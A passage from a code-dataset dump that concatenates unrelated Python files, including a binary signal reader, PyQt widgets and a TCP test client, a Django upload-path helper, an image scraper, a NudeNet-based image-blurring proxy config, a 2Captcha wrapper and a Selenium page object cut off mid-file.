print('-----------------------------------------------------------------')\n print('k ', k)\n\n # Перемещаемся по байтам для считывания сигналов и разовых команд на тактах\n\n # тут int_quantity_of_tacts\n tlist = []\n s1 = []\n s2 = []\n rk1 = []\n for t in range(int_quantity_of_tacts):\n # Считывание сигналов\n tlist.append((t + 1) / 100)\n # print(f.read(4*int_quantity_of_signals))\n signals = f.read(4 * int_quantity_of_signals)\n floatsignals = struct.unpack('%sf' % int_quantity_of_signals, signals)\n # print(len(floatsignals))\n # print(floatsignals.__len__())\n s1.append(floatsignals[0])\n s2.append(floatsignals[1])\n\n f.seek(14 + k + 4 * int_quantity_of_signals)\n\n # for j in range(int_quantity_of_signals):\n # signal = f.read(4)\n # intsignal = struct.unpack('f',signal)\n # f.seek(14+k+4*(j+1))\n #\n # f.seek(14+k+(4*int_quantity_of_signals + int_quantity_of_raz_command)*(t+1))\n # if t > 9980:\n # for flsignal in floatsignals:\n # print('сигналы: ', signals, flsignal)\n # print(14+k+4*(j+1))\n\n # Считывание разовых команд\n raz_command = f.read(int_quantity_of_raz_command)\n int_raz_command = struct.unpack('%sb' % int_quantity_of_raz_command, raz_command)\n\n # Добавляем значения разовой команды №37 в список\n rk1.append(int_raz_command[37])\n # print('Разовые команды: ', int_raz_command)\n\n f.seek(14 + k + (4 * int_quantity_of_signals) + int_quantity_of_raz_command)\n k += (4 * int_quantity_of_signals) + int_quantity_of_raz_command\n\n # print('Разовая команда: ', rk1)\n\n # # Построение графика\n # fig = plt.figure()\n # # scatter1 = plt.scatter(0.0, 3.0)\n # plt.errorbar(tlist, s1)\n # plt.errorbar(tlist, rk1)\n # grid1 = plt.grid(True)\n # plt.show()\n\n\nif __name__ == \"__main__\":\n main(\"C:/Users/alexxstepan/PycharmProjects/Data.rec\")\n\n","sub_path":"src/Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"195660991","text":"#!/usr/bin/python\n#-*- coding: UTF-8 -*-\n\nimport unittest\nimport requests\n\n\nclass PollsTest(unittest.TestCase):\n def setUp(self):\n self.base_url = 'http://127.0.0.1:8000/polls'\n\n def tearDown(self):\n pass\n\n def test_get_poll_index(self):\n '''测试投票系统首页'''\n r = requests.get(self.base_url)\n code = r.status_code\n text = r.text\n self.assertEqual(code, 200)\n\n def test_get_poll_question(self):\n '''获得问题1的所有选项'''\n r = requests.get(self.base_url + '/1/')\n code = r.status_code\n text = r.text\n self.assertEqual(code, 200)\n self.assertIn(\"3\", text)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"socketlabel/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"400719549","text":"# -*- coding: utf-8 -*-\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Author: Edinson E. 
Padrón Urdaneta\n# Email: epadron@4geeks.co\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Módulos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nfrom django.db import models\nfrom errno import EEXIST\nfrom hashlib import sha1\nfrom mintur.settings import MEDIA_ROOT\nfrom os import makedirs\nfrom os import path\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Constantes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nERROR_MSG = (\n 'No hay forma de conseguir el usuario para este modelo.'\n '\\n¿Está seguro que no prefiere usar la clase Model'\n ' en lugar de esta clase para extender su modelo?'\n)\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Clases ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass CustomFileAllocatorModel(models.Model):\n class Meta:\n abstract = True\n\n def save(self):\n if u'cedula' in dir(self):\n key_str = self.rif\n\n elif u'pst' in dir(self):\n key_str = self.pst.rif\n\n elif u'declaracion' in dir(self):\n key_str = self.declaracion.pst.rif\n \n else:\n raise Exception(ERROR_MSG)\n\n for field in self._meta.fields:\n if isinstance(field, models.FileField):\n process_file_field(field, key_str)\n\n super(CustomFileAllocatorModel, self).save()\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Funciones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef create_directory_if_not_exists(relative_path_str):\n complete_path_str = path.join(MEDIA_ROOT, relative_path_str)\n\n if not path.exists(complete_path_str):\n try:\n makedirs(complete_path_str)\n\n except OSError as exception:\n if exception.errno != EEXIST or not path.isdir(path):\n raise exception\n\n\ndef gen_path_str_from_key_str(key_str):\n hash_str = sha1(key_str).hexdigest()\n return path.join(*(hash_str[i:i+4] for i in xrange(0, 40, 4)))\n\n\ndef process_file_field(field, key_str):\n field.upload_to = gen_path_str_from_key_str(key_str)\n create_directory_if_not_exists(field.upload_to)\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n","sub_path":"utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"239356619","text":"from flask import Flask, render_template\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n names = ['akshay','bhikan','sandeep','tejas']\r\n date = []\r\n for i in names:\r\n url = \"https://7bwcdzfj44.execute-api.us-east-1.amazonaws.com/sanitizerappretrieve?Name=\"+i\r\n resp = requests.get(url)\r\n data = resp.json()\r\n print(data)\r\n #[{'name': 'sandeep', 'date': '31-09-2020'}]\r\n date.append(data['date'])\r\n return render_template('stats.html', p1= names[0],d1=date[0], p2=names[1], d2=date[1],p3=names[2], d3=date[2],p4=names[3], d4=date[3])\r\n#https://sw0sm7rpq5.execute-api.us-east-1.amazonaws.com/sanitizerappinsert?Name=someone&date=someday\r\n# above url is the url to insert data \r\n# https://7bwcdzfj44.execute-api.us-east-1.amazonaws.com/sanitizerappretrieve?Name=someone\r\n# above url is the url which is to retrieve\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=5000, 
debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473458091","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QProxyStyle\nfrom PyQt5.QtWidgets import QStyle\nfrom PyQt5.QtWidgets import QStyleOption\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QStyleOptionTab\nfrom PyQt5.QtGui import QBrush, QTextOption, QPen\nfrom PyQt5.QtCore import QRectF\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nimport typing\n\n\nclass TabStyle(QProxyStyle):\n\n # override method\n def sizeFromContents(self, content_type: QStyle.ContentsType,\n option: 'QStyleOption', size: QtCore.QSize, widget: QWidget):\n\n size = QProxyStyle.sizeFromContents(content_type, option, size, widget)\n\n if content_type == QStyle.CT_TabBarTab:\n size.transpose()\n size.setHeight(90)\n size.setWidth(44)\n\n return size\n\n def drawControl(self, element: QStyle.ControlElement, option: 'QStyleOption',\n painter: QtGui.QPainter, widget: typing.Optional[QWidget] = ...):\n\n if element == QStyle.CE_TabBarTabLabel:\n tab = QStyleOptionTab(option)\n if tab:\n all_rect = tab.rect\n\n if tab.state and QStyle.State_Selected:\n painter.save()\n painter.setPen(QPen(0x89cfff))\n painter.setBrush(QBrush(0x89cfff))\n painter.drawRect(all_rect.adjusted(6, 6, -6, -6))\n painter.restore()\n\n text_option = QTextOption()\n text_option.setAlignment(Qt.AlignCenter)\n if tab.state and QStyle.State_Selected:\n painter.setPen(QPen(0xf8fcff))\n else:\n painter.setPen(QPen(0x5d5d5d))\n painter.drawText(QRectF(all_rect), tab.text, text_option)\n return\n\n if element == QStyle.CE_TabBarTab:\n QProxyStyle.drawControl(element, option, painter, widget)\n\n\n'''\n void drawControl(ControlElement element, const QStyleOption *option, \n QPainter *painter, const QWidget *widget) const\n {\n if (element == CE_TabBarTabLabel) {\n if (const QStyleOptionTab *tab = qstyleoption_cast(option)) {\n QRect allRect = tab->rect;\n\n if (tab->state & QStyle::State_Selected) {\n painter->save();\n painter->setPen(0x89cfff);\n painter->setBrush(QBrush(0x89cfff));\n painter->drawRect(allRect.adjusted(6, 6, -6, -6));\n painter->restore();\n }\n QTextOption option;\n option.setAlignment(Qt::AlignCenter);\n if (tab->state & QStyle::State_Selected) {\n painter->setPen(0xf8fcff);\n }\n else {\n painter->setPen(0x5d5d5d);\n }\n\n painter->drawText(allRect, tab->text, option);\n return;\n }\n }\n\n if (element == CE_TabBarTab) {\n QProxyStyle::drawControl(element, option, painter, widget);\n }\n }\n};\n'''\n","sub_path":"TabStyle.py","file_name":"TabStyle.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31863447","text":"\n# add the following variables to test in a particular gcp environment\nworkspaceProjectId = \"\" # a solution workspace project id\ndeploymentProjectId = \"\" # a solution environment project id\nactivator_git_url = \"\" # git url for an external activator\nbase_folder_id = \"\" # tranquility base folder\nteamCloudIdentityGroup = \"\" # valid cloud identity group\nteam_members = [\n {\n \"role\": {\n \"name\": \"admin\",\n \"cloudIdentityGroup\": \"ADD HERE\",\n \"id\": 1,\n \"description\": \"eagle console admin role\"\n },\n \"user\": {\n \"lastName\": \"ADD_HERE\",\n \"email\": \"ADD_HERE\",\n \"id\": 1,\n \"firstName\": \"ADD_HERE\",\n \"isAdmin\": False,\n \"showWelcome\": True\n 
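# sample team member entry for functional testing; fill in the ADD_HERE placeholders first\n        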
},\n \"id\": 2\n }\n]\n","sub_path":"src/test/python/tranquilitybase/gcpdac/functional/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45044150","text":"# needs 2 buttons and an output box.\n\n# when you click a button:\n# - the time is stored\n# - message is sent\n# - message is received\n# - time is stored again\n# - time taken to send and then receive a reply is taken and outputted.\n\n# Take some averages of that result\n\n# 500\n#####################################################\n# 10 #\n# //////////////////// //////////////////// # \n# // // // // #\n# // Button 1 // // Button 2 // #\n# // // // // #\n# //////////////////// //////////////////// # 200\n# 10 10 10 #\n# //////////////////////////////////////////// #\n# // Output Text Box 480x30 // #\n# //////////////////////////////////////////// #\n# 10 #\n#####################################################\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5 import QtCore\nfrom queue import SimpleQueue\n\nimport json\nimport sys\nimport time\nimport socket\nimport threading\nimport time\n\nclass globalData:\n def __init__(self):\n self.ip = ''\n self.port = 0\n\n self.updates = 0\n\n self.forStr = 0\n self.StrOutQ = SimpleQueue()\n\n self.forJson = 0\n self.JsonOutQ = SimpleQueue()\n\n self.startTime = 0\n self.serverTime = 0\n self.endTime = 0\n self.retSize = 0\n self.gotSize = 0\n\n\nclient = 0\ngdata = globalData()\nisRun = True\nisCon = False\ncBGThread = None\n\n\nclass TestClient(QWidget):\n\n def __init__(self):\n super().__init__()\n self.outBox = 0\n self.button1 = 0\n self.button2 = 0\n\n self.initUI()\n\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.timerEvent)\n self.timer.start(100)\n\n def timerEvent(self):\n while gdata.updates is not 0:\n msg = (\"%s-%s, sizes are %s, %s\" % (str(gdata.startTime), str(gdata.endTime), str(gdata.retSize), str(gdata.gotSize)))\n self.outBox.setText(msg)\n gdata.updates -= 1\n\n def doStringTest(self):\n print(\"uh oh\")\n gdata.startTime = round(time.time() % 60, 3)\n gdata.StrOutQ.put(\"Arbitrary Message\")\n gdata.forStr += 1\n\n def doJsonTest(self):\n print(\"uh oh but Json\")\n gdata.startTime = round(time.time() % 60, 3)\n dict = {'msg': \"Arbitrary Message\"}\n gdata.JsonOutQ.put(dict)\n gdata.forJson += 1\n\n def initUI(self):\n\n self.button1 = QPushButton(\"String Test\")\n self.button1.setGeometry(10, 10, 235, 140)\n self.button1.clicked.connect(self.doStringTest)\n self.button1.setParent(self)\n self.button1.show()\n\n self.button2 = QPushButton(\"Json Test\")\n self.button2.setGeometry(255, 10, 235, 140)\n self.button2.clicked.connect(self.doJsonTest)\n self.button2.setParent(self)\n self.button2.show()\n\n self.outBox = QLineEdit(self)\n self.outBox.setGeometry(10, 160, 480, 30)\n self.outBox.setReadOnly(True)\n\n self.setGeometry(300, 300, 500, 200)\n self.setWindowTitle(\"Test Client\")\n self.show()\n\n def closeEvent(self, event):\n global isRun\n global isCon\n isRun = False\n isCon = False\n\n\ndef recFuncStr(socket):\n global isCon\n global gdata\n while isCon:\n while gdata.forStr is not 0:\n try:\n size = socket.recv(2)\n intSize = int.from_bytes(size, byteorder='big')\n data = socket.recv(intSize)\n\n myData = data.decode('utf-8').split(' ')\n\n # store all the data ready for displaying\n gdata.serverTime = myData[0] # problems with server time not matching up means we ignore this now\n 
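# myData[1] is the payload size reported back by the server\n            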
gdata.retSize = myData[1]\n gdata.endTime = round(time.time() % 60, 3)\n gdata.gotSize = intSize\n\n # tell which loops have a request waiting on them / completed request\n gdata.updates += 1\n gdata.forStr -= 1\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef recFuncJson(socket):\n global isCon\n global gdata\n while isCon:\n while gdata.forJson is not 0:\n try:\n size = socket.recv(2)\n intSize = int.from_bytes(size, byteorder='big')\n data = socket.recv(intSize)\n\n obj = json.loads(data.decode('utf-8'))\n gdata.retSize = obj['size']\n gdata.serverTime = obj['time']\n gdata.endTime = round(time.time() % 60, 3)\n gdata.gotSize = intSize\n\n gdata.updates += 1\n gdata.forJson -= 1\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef senFuncStr(socket):\n global isCon\n global gdata\n while isCon:\n while not gdata.StrOutQ.empty():\n try:\n msgdict = gdata.StrOutQ.get()\n msgencode = msgdict.encode()\n msglen = len(msgencode)\n\n socket.send(msglen.to_bytes(2, byteorder='big'))\n socket.send(msgencode)\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef senFuncJson(socket):\n global isCon\n global gdata\n while isCon:\n while not gdata.JsonOutQ.empty():\n try:\n msgdict = gdata.JsonOutQ.get()\n msgencode = json.dumps(msgdict).encode()\n msglen = len(msgencode)\n\n socket.send(msglen.to_bytes(2, byteorder='big'))\n socket.send(msgencode)\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef BGThread():\n mySock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n global isRun\n global isCon\n while isRun:\n while not isCon:\n try:\n mySock.connect((gdata.ip, gdata.port))\n isCon = True\n recThreadJson = threading.Thread(target=recFuncJson, args=(mySock,))\n recThreadJson.start()\n senThreadJson = threading.Thread(target=senFuncJson, args=(mySock,))\n senThreadJson.start()\n\n recThreadStr = threading.Thread(target=recFuncStr, args=(mySock,))\n recThreadStr.start()\n senThreadStr = threading.Thread(target=senFuncStr, args=(mySock,))\n senThreadStr.start()\n except Exception as e:\n print(\"ERROR: \" + str(e))\n time.sleep(1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv) # needed???? 
idk\n client = TestClient()\n\n gdata.ip = 'localhost'\n gdata.port = 9000\n\n cBGThread = threading.Thread(target=BGThread, args=())\n cBGThread.start()\n\n sys.exit(app.exec_())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Poster & such/testClient.py","file_name":"testClient.py","file_ext":"py","file_size_in_byte":7157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"101617619","text":"#coding:utf-8 \nimport re\nimport urllib.request\nimport os\nos.chdir(\"D:/学习/Python/MyCodes/20180801爬取图片/tu/\")\n\n# ------ 获取网页源代码的方法 ---\ndef getHtml(url):\n page = urllib.request.urlopen(url)\n html = page.read()\n return html\n\n# ------ 获取帖子内所有图片地址的方法 ------\ndef getImg(html):\n # ------ 利用正则表达式匹配网页内容找到图片地址 ------\n reg = r'src=\"([.*\\S]*\\.jpg)\"' #在这个网页取到的都是缩略图,这个网站的规律是缩略图的名称有“rn”,原图没有\n imgre = re.compile(reg);\n imglist = re.findall(imgre, html)\n return imglist\n\n\nMyUrls = []\nMyUrls1 = [\"http://www.umei.cc/bizhitupian/meinvbizhi/%s.htm\" % i for i in list(range(1,2))]\nMyUrls += MyUrls1\n#MyUrls2 = [\"http://www.umei.cc/bizhitupian/weimeibizhi/%s.htm\" % i for i in list(range(2,7))]\n#MyUrls += MyUrls2\n#说明:把下面##替换为你想爬的网址,备注:该网址需要是分多页显示图片的,可以把range中的“7”替换为你想爬多少页,当然,前提是网站里真的有这么多页\n#MyUrls3 = [\"##%s.htm\" % i for i in list(range(2,7))]\n#MyUrls += MyUrls3\n\n \nimgName = 0\nfor url in MyUrls:\n html = getHtml(url)\n html = html.decode('UTF-8') \n imgList = getImg(html)\n for imgPath in imgList:\n # ------ 这里最好使用异常处理及多线程编程方式 ------\n #print('原来是:',imgPath)\n if 'rn' in imgPath: \n imgPath_Original = imgPath.replace('rn','')\n #print('变成了:',imgPath_Original) \n else:\n imgPath_Original = imgPath\n \n try:\n# f = open('D:\\\\tu\\\\'+ str(imgName)+\".jpg\", 'wb')\n f = open(str(imgName)+\".jpg\", 'wb')\n f.write((urllib.request.urlopen(imgPath_Original)).read())\n print(imgPath_Original)\n f.close()\n except Exception as e:\n print(imgPath_Original+\" error\")\n imgName += 1\n\nprint(\"All Done!!!\")\n","sub_path":"get_tp_ok2.0.py","file_name":"get_tp_ok2.0.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473210373","text":"from os.path import exists\n\nimport logging\nfrom requests import post, get\nfrom time import sleep\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass SolveCaptcha:\n def __init__(self, wait_time=5):\n self.settings = {\"url_request\": \"http://2captcha.com/in.php\",\n \"url_response\": \"http://2captcha.com/res.php\",\n \"key\": 'e99ba665b8175648b7c06e5243107f2c'}\n self.waittime = wait_time\n\n def get_balance(self):\n \"\"\"\n This request need for get balance\n :return: OK | 1 ERROR!\n \"\"\"\n fullurl = \"%s?action=getbalance&key=%s\" % (\n self.settings['url_response'], self.settings['key'])\n request = get(fullurl)\n if \".\" in request.text:\n logger.info(\"Balance: %s\" % request.text)\n return request.text\n\n elif request.text == \"ERROR_KEY_DOES_NOT_EXIST\":\n logger.error(\"You used the wrong key in the query\")\n return\n\n elif request.text == \"ERROR_WRONG_ID_FORMAT\":\n logger.error(\"Wrong format ID CAPTCHA. 
ID must contain only numbers\")\n            return\n\n        elif request.text == \"ERROR_CAPTCHA_UNSOLVABLE\":\n            logger.error(\"Three different workers were unable to solve the captcha\")\n            return\n\n    def solve(self, path_file):\n        \"\"\"\n        This function reads and uploads the image file, and wraps the whole\n        captcha-solving flow\n        :param path_file: path of the image\n        :return: OK | 1 ERROR!\n        \"\"\"\n        if exists(path_file):\n            files = {'file': open(path_file, 'rb')}\n            payload = {'key': self.settings['key'], 'method': 'post'}\n            logger.info(\"Uploading to 2Captcha.com..\")\n            request = post(self.settings['url_request'], files=files,\n                           data=payload)\n            if request.ok:\n                if request.text.split('|')[0] == \"OK\":\n                    logger.info(\"Upload Ok\")\n                    return self.get_result(request.text.split('|')[1])\n\n                elif request.text == \"ERROR_WRONG_USER_KEY\":\n                    logger.error(\"Wrong 'key' parameter format, it should contain 32 symbols\")\n                    return\n                elif request.text == \"ERROR_KEY_DOES_NOT_EXIST\":\n                    logger.error(\"The 'key' doesn't exist\")\n                    return\n                elif request.text == \"ERROR_ZERO_BALANCE\":\n                    logger.error(\"You don't have money on your account\")\n                    return\n                elif request.text == \"ERROR_NO_SLOT_AVAILABLE\":\n                    logger.error(\"The current bid is higher than the maximum bid set for your account.\")\n                    return\n                elif request.text == \"ERROR_ZERO_CAPTCHA_FILESIZE\":\n                    logger.error(\"CAPTCHA size is less than 100 bytes\")\n                    return\n                elif request.text == \"ERROR_TOO_BIG_CAPTCHA_FILESIZE\":\n                    logger.error(\"CAPTCHA size is more than 100 Kbytes\")\n                    return\n                elif request.text == \"ERROR_WRONG_FILE_EXTENSION\":\n                    logger.error(\"The CAPTCHA has a wrong extension. \"\n                                 \"Possible extensions are: jpg,jpeg,gif,png\")\n                    return\n                elif request.text == \"ERROR_IMAGE_TYPE_NOT_SUPPORTED\":\n                    logger.error(\"The server cannot recognize the CAPTCHA file type.\")\n                    return\n                elif request.text == \"ERROR_IP_NOT_ALLOWED\":\n                    logger.error(\"The request was sent from an IP that is not on the list of \"\n                                 \"your IPs. Check the list of your IPs in the system.\")\n                    return\n                elif request.text == \"IP_BANNED\":\n                    logger.error(\"The IP address you're trying to access our server with is banned \"\n                                 \"due to many frequent attempts to access the server using wrong authorization keys. 
\"\n \"To lift the ban, please, contact our support team via email: support@2captcha.com\")\n return\n else:\n logger.error(\"File %s not exists\" % path_file)\n return\n\n\nif __name__ == '__main__':\n captcha = SolveCaptcha()\n print(captcha.solve('images/captcha_original.png'))\n","sub_path":"test_task/captcha_resolve.py","file_name":"captcha_resolve.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"495141770","text":"import tkinter as tk\nfrom player import Player\n\nclass Screen(tk.Canvas):\n\n def __init__(self, master):\n\n tk.Canvas.__init__(self,master=master)\n\n master.update()\n self['width'] = self.width = master.winfo_screenwidth() \n self['height'] = self.height = master.winfo_screenheight()\n self['bg'] = \"white\"\n\n self.focus_get()\n\n self.pack_propagate(0)\n self.pack()\n\n self.player = Player(self)\n self.player.show()\n\n self.generate()\n\n def getSpeed(self):\n return 3\n \n def generate(self):\n cx,cy = self.width / 2,self.height / 2\n self.img = tk.PhotoImage(file='.\\\\res\\\\textures\\\\tiles\\\\tile_0.png').zoom(10)\n size = self.img.width()\n self.create_image(cx - size / 2,cy - size / 2,image=self.img)\n","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"37122211","text":"\"\"\"\nLessons for learning data types in Python\n\"\"\"\n\n\n# Lists\nbanks = [\"charles schwab\", \"capital one\", \"american express\"]\n\n# Dict\nbanks = [\n {\"name\": \"charles schwab\"},\n {\"name\": \"capital one\"},\n {\"name\": \"american express\"},\n]\n\n# Tuples\ncash_accounts = (\"checking\", \"savings\")\ninvestment_accounts = (\"stock\", \"bond\", \"mutual_fund\")\ncredit_accounts = (\"credit_card\", \"student_loan\", \"mortgage\")\nprint(\"The largest credit account is\", max(credit_accounts), \"\\n\")\n\n#------------------------------------------------------------------\n\n# List iteration\nfor bank in banks:\n print(bank)\n\n# Dict deconstruction\nbank_names = [bank[\"name\"] for bank in banks]\nprint(bank_names)\n","sub_path":"day1/2-data_types.py","file_name":"2-data_types.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"622245398","text":"import sys\nimport multiprocessing as mp\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nfrom .widgets import DistWidget\n\nimport numpy as np\n\n\nclass DataThread(QtCore.QThread):\n def __init__(self, q, data):\n super().__init__()\n self.q = q\n self.data = data\n\n def run(self):\n for idx, a0dist, adist in iter(self.q.get, None):\n self.data[idx, :, 0] = a0dist\n self.data[idx, :, 1:] = adist.T\n\n\ndef process_target(q, nepisodes, alabels, olabels):\n na = len(alabels)\n no = len(olabels)\n\n olabels = ('*',) + olabels\n\n shape = nepisodes, na, no + 1\n data = np.full(shape, np.nan)\n\n app = QtGui.QApplication([])\n gui = DistWidget().setup(data, alabels, olabels)\n gui.show()\n\n timer = QtCore.QTimer()\n timer.timeout.connect(gui.update)\n timer.start(1000)\n\n def endtimer():\n timer.stop()\n gui.update()\n\n t = DataThread(q, data)\n t.finished.connect(endtimer)\n t.start()\n\n sys.exit(app.exec_())\n\n\nclass Reactive_Plotter:\n def __init__(self, reactive, nepisodes):\n self.reactive = reactive\n\n alabels = tuple(reactive.aspace.values)\n olabels = tuple(reactive.ospace.values)\n\n 
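# distribution snapshots from each update() are streamed to the plotter process through this queue\n        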
self.q = mp.Queue()\n args = self.q, nepisodes, alabels, olabels\n self.p = mp.Process(target=process_target, args=args)\n self.p.daemon = True\n self.p.start()\n\n self.idx = 0\n\n def update(self, params):\n a0probs = self.reactive.a0model.probs(params[0], ())\n aprobs = self.reactive.amodel.probs(params[1], ())\n\n self.q.put((self.idx, a0probs, aprobs))\n self.idx += 1\n\n def close(self):\n self.q.put(None)\n","sub_path":"src/rl/graph/reactive_plotter.py","file_name":"reactive_plotter.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508082883","text":"\nimport json\nimport socket\n\ndef make_listen_sock(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((host, port))\n sock.listen(100) \n return sock\n\ndef get_json(player_socket):\n msg = player_socket.recv(1028).decode()\n \n if msg:\n return json.loads(msg)\n else:\n return None\n\ndef send_json(player_socket, json_):\n s = json.dumps(json_)\n player_socket.sendall(s.encode())\n\n","sub_path":"plumbing/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"308050452","text":"config = {\n # If enabled, only parts that are identified will be visible, and the rest of the image\n # will be blurred. This still takes `blocked_labels` into consideration, and parts matching\n # those labels will be visible.\n \"invert\": True,\n\n # Labels included in this list will be censored. Or, if `invert` is set to true, only these\n # labels will be visible in an image, and the rest will be blurred. Available labels can be\n # found in NudeNet's documentation: https://github.com/notAI-tech/NudeNet\n \"blocked_labels\": [\n # \"EXPOSED_ANUS\",\n # \"EXPOSED_ARMPITS\",\n \"COVERED_BELLY\",\n # \"EXPOSED_BELLY\",\n # \"COVERED_BUTTOCKS\",\n # \"EXPOSED_BUTTOCKS\",\n \"FACE_F\",\n # \"FACE_M\",\n \"COVERED_FEET\",\n \"EXPOSED_FEET\",\n # \"COVERED_BREAST_F\",\n # \"EXPOSED_BREAST_F\",\n # \"COVERED_GENITALIA_F\",\n # \"EXPOSED_GENITALIA_F\",\n # \"EXPOSED_BREAST_M\",\n # \"EXPOSED_GENITALIA_M\"\n ],\n\n # The directory that cached image files should be stored in\n \"cache_dir\": \"cache\",\n\n # The minimum content size for an image to be considered for censorship.\n # This filters out small images like icons, thumbnails, etc.\n \"min_content_size\": 10000,\n\n # The proxy will only pay attention to responses with a Content-Type included in the list below.\n # This allows you to filter out non-image types, or types of images that aren't relevant (e.g. SVGs).\n \"image_content_types\": [\n \"image/jpeg\",\n \"image/png\",\n \"image/webp\"\n ],\n\n # This is a mapping of the above content types to their relevant extensions. Eventually\n # this could probably be automated.\n \"image_extensions\": {\n \"image/jpeg\": \".jpg\",\n \"image/png\": \".png\",\n \"image/webp\": \".webp\"\n },\n\n # This is a mapping of the above content types to their relevant pillow/PIL types. When\n # we call image.save() we pass it one of these values. 
Eventually this could probably be\n    # automated.\n    \"image_pil_types\": {\n        \"image/jpeg\": \"JPEG\",\n        \"image/png\": \"PNG\",\n        \"image/webp\": \"WEBP\"\n    }\n}","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273562786","text":"from pageobject.订单管理.page_订单管理页 import OrderPage\nfrom pagelocators.订单管理.page_loc_创建订单页 import OrderCreatePageLoc as loc\nfrom common.handle_logger import logger\n\n\nclass OrderCreatePage(OrderPage):\n    \"\"\"Create Order page\"\"\"\n\n    # Select the purchase category\n    def select_kind(self, kind):\n        logger.info(\"--- Selecting purchase category: {} ---\".format(kind))\n        # Get the names of all purchase categories\n        kinds = self.find_elements(loc.kind_loc)\n        try:\n            # If the desired purchase category is in the list, click to select it\n            for i in kinds:\n                if i.text == kind:\n                    i.click()\n                    break\n        except:\n            logger.exception(\"--- Error: the selected purchase category does not exist ---\")\n\n    # Select the manufacturer\n    def select_manu(self, manu_name):\n        logger.info(\"--- Selecting manufacturer: {} ---\".format(manu_name))\n        # Click the manufacturer selection box\n        self.find_element(loc.manu_loc).click()\n        # Get the names of all manufacturers\n        names = self.find_elements(loc.manu_name_loc)\n        try:\n            # If the desired 